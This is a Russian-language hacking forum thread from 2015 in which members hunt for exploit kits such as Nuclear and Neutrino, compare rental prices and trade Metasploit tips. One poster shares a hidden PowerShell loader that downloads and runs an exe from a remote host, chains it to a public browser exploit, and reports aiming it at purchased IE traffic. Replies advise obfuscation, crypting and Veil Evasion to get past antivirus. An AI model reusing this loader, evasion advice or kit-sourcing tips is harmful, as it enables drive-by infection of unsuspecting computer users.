ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   Связки из паблика. Поделитесь ссылками (https://forum.antichat.io/showthread.php?t=434253)

san-ok 10.12.2015 01:58

Здраствуйте,

Поделитесь ссылками на связки експлоитов имеющихся в паблике, сам пока не могу найти, все ссылки которые нахожу - битые...(((

хелп плз

grimnir 10.12.2015 19:30

http://exploitpack.com/

ubepkr 12.12.2015 09:34

Цитата:

Сообщение от grimnir

Занятная игрушка.....вот только 500 евриков жалко на полную версию))

grimnir 12.12.2015 16:36

Цитата:

Сообщение от ubepkr

Занятная игрушка.....вот только 500 евриков жалко на полную версию))

кстати, до вашего поста даже не знал ,что у них есть платные версии

Надо поискать у китайцев,может кто слил уже хотя бы старую,но про версию

Хотя тот же метасплойт погибче будет

eltex 12.12.2015 17:05

Цитата:

Сообщение от san-ok

сам пока не могу найти, все ссылки которые нахожу - битые...(((

100% ты даже не искал, а пошел лёгким путём... "знатоки подскажут"

результата никогда не добьёшься

ZodiaX 12.12.2015 17:45

Про версия по моему 300 €, 500 это уже прем с тех поддержкой)

А так старые сборки того же Nuclear'a светились в сети.

san-ok 12.12.2015 19:23

Цитата:

Сообщение от eltex

100% ты даже не искал, а пошел лёгким путём... "знатоки подскажут"
результата никогда не добьёшься

Искал целую неделю, даже маленькую связку сам сделал на базе metasploit, но ожидаемого пробива нету. Жаль что знатоки жадничают...почти никто не хочет дать даже ссылку, я уже молчу о том чтобы залить что-то в паблик.

ZodiaX 12.12.2015 22:26

От паблик связки эффект будет тот же, приватные варианты стоят не плохих денег.

Да и связки это только инструмент, запилите в metasploit пару 0day к яве, флешу или браузеру и будет вам пробив.

san-ok 12.12.2015 23:01

Цитата:

Сообщение от ZodiaX

От паблик связки эффект будет тот же, приватные варианты стоят не плохих денег.
Да и связки это только инструмент, запилите в metasploit пару 0day к яве, флешу или браузеру и будет вам пробив.

Спасибо за ответ. У меня еще 2 вопроса. Извини если покажуться глупыми т. к. я новичок можна сказать.

1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?

2. Некотрые експлоиты имеют в себе редиректы либо и-фреймы, которые ссылаються на некий относительный URL. Следовательно такие експлоиты нельзя сохранить просто так в html. Как ними пользоваться тогда? Использовать при запущенном метасплоите?

private_static 12.12.2015 23:17

Цитата:

Сообщение от san-ok

Некотрые експлоиты имеют в себе редиректы либо и-фреймы, которые ссылаються на некий относительный URL. Следовательно такие експлоиты нельзя сохранить просто так в html. Как ними пользоваться тогда? Использовать при запущенном метасплоите?

да

Цитата:

Сообщение от san-ok

1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?

нет,0day вы просто так не скачаете, на то они и 0day, либо самому искать но на это нужен огромный скил и по сути этим занимаются единицы(по сравнению с оравой труъ хакиров чьи познания ограничиваются использованием хавиджа и акунетикса и возможно скулмапа на начальном уровне), либо покупать 0day за большие деньги

san-ok 12.12.2015 23:51

понятно. спасибо большое за хороший ответ

san-ok 13.12.2015 01:20

Еще вопрос. Есть ли способ создать какой-то батник для Metasploit консоли, чтобы команды вручную не набирать, а сохранить большую цепочку?

eltex 13.12.2015 10:53

Цитата:

Сообщение от san-ok

Искал целую неделю, даже маленькую связку сам сделал на базе metasploit, но ожидаемого пробива нету. Жаль что знатоки жадничают...почти никто не хочет дать даже ссылку, я уже молчу о том чтобы залить что-то в паблик.

В паблике не найдёшь нормального софта...

Нанимай кодера, составляй ТЗ и будет тебе счастье)

grimnir 13.12.2015 11:42

Цитата:

Сообщение от san-ok

Еще вопрос. Есть ли способ создать какой-то батник для Metasploit консоли, чтобы команды вручную не набирать, а сохранить большую цепочку?

metasploit resource file .rc

https://www.offensive-security.com/m...reter-scripts/

grimnir 13.12.2015 11:45

Цитата:

Сообщение от san-ok

Спасибо за ответ. У меня еще 2 вопроса. Извини если покажуться глупыми т. к. я новичок можна сказать.
1. "запилите в metasploit пару 0day" - как я понимаю это означает скачать свежие rb-файлы с сайта метасплоита, залить их в "exploits\windows\browser" и потом использовать?

Если не 0-day то хотя бы можно использовать 1day ,на основе сверки патчей ,бинарников и т.д

http://securityaffairs.co/wordpress...iffing-patch-management-the-side-threats.html

https://exploitshop.wordpress.com/

https://xakep.ru/2011/11/16/57581/

gentype 14.12.2015 22:13

Цитата:

Сообщение от ZodiaX

Про версия по моему 300 €, 500 это уже прем с тех поддержкой)
А так старые сборки того же Nuclear'a светились в сети.

оооо поделись старой версией нуклера?

san-ok 14.12.2015 22:15

Цитата:

Сообщение от gentype

оооо поделись старой версией нуклера?

И я бы хотел чтоб кто-то поделился...но я думаю не дождемся

gentype 14.12.2015 22:21

у меня есть все другие связки, но хотел бы нуклер посмотреть

san-ok 14.12.2015 22:23

Цитата:

Сообщение от gentype

у меня есть все другие связки, но хотел бы нуклер посмотреть

ты их покупал или в паблике где-то взял?

gentype 14.12.2015 22:25

все из паблика, коллекционирую разный софт кони, лодыри, стиллеры, связки etc

rct 15.12.2015 00:01

Цитата:

Сообщение от grimnir

А это не база с exploit-db?

san-ok 15.12.2015 00:07

Цитата:

Сообщение от rct

А это не база с exploit-db?

это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас

rct 15.12.2015 00:35

Цитата:

Сообщение от san-ok

это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас

Просто показалось что оно на https://github.com/offensive-securit...se-bin-sploits построено.

san-ok 15.12.2015 01:10

Еще вопрос, подскажите кто спец.

Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/

К нему я прикрепил вот такой загрузчик:

set shell=createobject("Shell.Application")

shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1

При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.

Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..

Подскажите плз...или с трафом тем что-то не так...тогда где его брать..

rct 15.12.2015 01:28

Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.

san-ok 15.12.2015 01:53

Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?

Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?

private_static 15.12.2015 02:03

Цитата:

Сообщение от san-ok

Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?
Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?

да так не делаются дела,обычно под это дело приватный софт пишут

gentype 15.12.2015 10:23

Цитата:

Сообщение от san-ok

Еще вопрос, подскажите кто спец.
Кроме MSF я отдельно тестировал вот этот сплоит:
https://www.exploit-db.com/exploits/35229/
К нему я прикрепил вот такой загрузчик:
set shell=createobject("Shell.Application")
shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('
http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process
'mysoft.exe'", "", "open", 1
При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.
Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
Подскажите плз...или с трафом тем что-то не так...тогда где его брать..

Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!

grimnir 15.12.2015 13:33

Цитата:

Сообщение от rct

А это не база с exploit-db?

не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)

Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php

Через гугл переводчик

rct 15.12.2015 13:49

Цитата:

Сообщение от grimnir

не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
Если по теме уязвимостей и метасплойта то вот хороший китайский сайт
http://www.metasploit.cn/forum.php
Через гугл переводчик

Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01

grimnir 15.12.2015 20:24

Цитата:

Сообщение от rct

Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01

http://exploitpack.com/dreadnought.zip

должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит

rct 15.12.2015 21:57

Цитата:

Сообщение от grimnir

http://exploitpack.com/dreadnought.zip
должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит

Автоматом не обновляется, а просто открывает браузер. Суть в другом, я там полазил внутри, обрати внимание на "эксплоит" ExploitPack/exploits/code/Windows-8.1-ahcache.sys.py

Я ржал))

UNIXTREID 20.12.2015 15:09

Посмотрел ссылки... Противоречивое впечатление Exploitpack, действительно неоригинальный какой-то, а стоит очень даже весомо )) exploitshop.wordpress устаревший (висит последняя заметка о MS12-020 Remote Code Execution Так я вот под него эксплоит до сих пор ищу, нигде нету)

По поводу эксплоит-китов: Nuclear, конечно, рулит. Но его как найти, в даркнете, наверное, только...В паблике находил только исходники RIG и Blackhole их последних версий (последних уже навечно ). Круто было бы глянуть на хоть какие-нибудь паблик выкладки Nuclear'а, пусть и старые.

P.S. Кстати, вы слышали что-нибудь про эксплоит-пак Microsoft Word Intruder ??? Недавно узнал про такой. Действует через скомпилированные вордовские доки (Ну действительно, актуально, удобно). Типа высокий пробив, в паблике экземпляров, якобы, нет...

san-ok 20.12.2015 17:09

скиньте сайт официальный, где Nuclear купить можно. в выдаче посиковой не нахожу

seeattack 20.12.2015 17:43

официального сайта нету)

+ связку не каждому продадут + она не продается, а сдается в аренду.

san-ok 20.12.2015 20:07

должно же тогда существовать место куда обращаться за услугами аренды

seeattack 20.12.2015 20:22

Jabber

и на подносе тебе его не принесут)

gentype 20.12.2015 22:11

Цитата:

Сообщение от san-ok

должно же тогда существовать место куда обращаться за услугами аренды

А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино

san-ok 20.12.2015 22:32

Цитата:

Сообщение от gentype

А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино

я буду иметь тебя в виду, если что обращусь

seeattack 20.12.2015 22:51

Цитата:

Сообщение от gentype

А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино

по поводу Nuclear насколько мне известно только аренда...

около 700$ в неделю..

зависит от количества трафика которое пройдет через нее.


Время: 17:20